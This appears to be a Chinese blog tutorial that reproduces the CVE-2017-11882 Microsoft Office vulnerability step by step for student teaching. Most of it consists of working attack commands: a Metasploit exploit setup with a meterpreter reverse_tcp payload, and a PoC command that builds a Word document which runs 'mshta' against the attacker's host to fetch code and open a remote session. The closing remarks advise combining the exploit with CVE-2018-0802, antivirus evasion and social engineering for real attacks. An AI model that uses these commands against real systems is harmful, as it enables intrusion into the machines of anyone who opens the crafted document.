美文网首页万网极研社渗透测试
CVE-2017-11882漏洞超详细复现

CVE-2017-11882漏洞超详细复现

作者: 泽英君 | 来源:发表于2019-02-09 18:34 被阅读303次

    开篇闲聊:

    CVE-2017-11882漏洞复现的文章我之前在公司社区里已经发过一遍了,但是最近又研究了一点并且和CVE-2018-0802结合了一下,觉得这个漏洞还是有必要再写写,顺便凑一下我好久没更新过的社团简书作业吧 : ),此外,本篇漏洞复现旨在给明年的学弟进行kail的教学,所以内容很琐碎,请各位表哥绕道......

    漏洞概述:

    CVE-2017-11882是一个潜伏17年之久的并于2017年被公开的可以通杀office2003到2016的所有版本的漏洞,攻击者只需给目标发送一个制作好的word文档并且这个文档被打开即可完成攻击。

    复现环境:

    kail linux

    Windows7(亲测Win10也可以,不过需要使用免杀技术,不然会被报毒)

    office2016(选择哪个都行,我之前尝试使用2003,激活这关就让我头大)

    Poc代码(https://github.com/Ridter/CVE-2017-11882/)(网上挺多的,我给你们随便找了一个)

    复现过程:

    开启kail终端输入:

    root@wuyou:~# ifconfig

    查看你的IP然后再开个新终端输入:

    root@wuyou:~# msfconsole

    msf > search cve-2017-11882

    选择哪个都可以,这里我使用了网上的另一个rb文件

    msf > use exploit/windows/smb/CVE-2017-11882(看清楚你自己的选项,别直接复制)

    输入的时候别忘了自动补齐......

    msf exploit(windows/smb/CVE-2017-11882) > show options

    查看需要填入的内容

    msf exploit(windows/smb/CVE-2017-11882) > set lhost 192.168.190.134

    msf exploit(windows/smb/CVE-2017-11882) > set uripath 11882

    msf exploit(windows/smb/CVE-2017-11882) > set payload windows/x64/meterpreter/reverse_tcp

    msf exploit(windows/smb/CVE-2017-11882) > exploit

    开始监听

    这时开始制作doc文档吧!

    进入你放py脚本的文件夹内然后输入命令即可(记得改成你自己的IP)

    root@wuyou:~/cve-2017-11882# python CVE-2017-11882.py -c "mshta http://192.168.190.134:8080" -o 11882.doc

    然后把制作好的doc文档在靶机上打开

    靶机上一切正常

    这时渗透机上出现:

    Ctrl+C终止掉后选择Session1

    msf exploit(windows/smb/CVE-2017-11882) >sessions 1

    这时成功连接(如果不行就尝试在靶机右键doc文档点击编辑!打开查看和编辑文档是有区别的)

    截个屏玩一下吧
    meterpreter > screenshot

    结语:

    这个漏洞如果想要在实战中使用还要和CVE-2018-0802结合起来并使用一些免杀技术,再结合一点社工才能提高成功率,我写这个复现不是想要大家使用这些去进行攻击,而是我发现通过复现这个漏洞,可以学习到很多的细节方面的知识,而且整天挖洞觉得累了研究几个CVE也是挺有趣的。

    相关文章

      网友评论

        本文标题:CVE-2017-11882漏洞超详细复现

        本文链接:https://www.haomeiwen.com/subject/jtlzsqtx.html